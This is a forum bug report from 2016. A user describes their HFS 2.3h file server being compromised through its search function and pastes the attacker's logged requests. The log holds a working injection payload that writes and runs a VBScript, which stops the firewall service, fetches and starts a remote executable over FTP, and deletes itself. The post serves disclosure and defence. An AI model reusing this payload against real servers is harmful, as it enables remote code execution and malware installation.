Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - apanx

Pages: [1]
Bug reports / Execution Exploit in search function
« on: June 14, 2016, 09:18:05 PM »
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

Code: [Select]
2016-06-13 15:58:52 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject("""")""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 1740 Served 3.9 K
2016-06-13 15:58:52 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum

Pages: [1]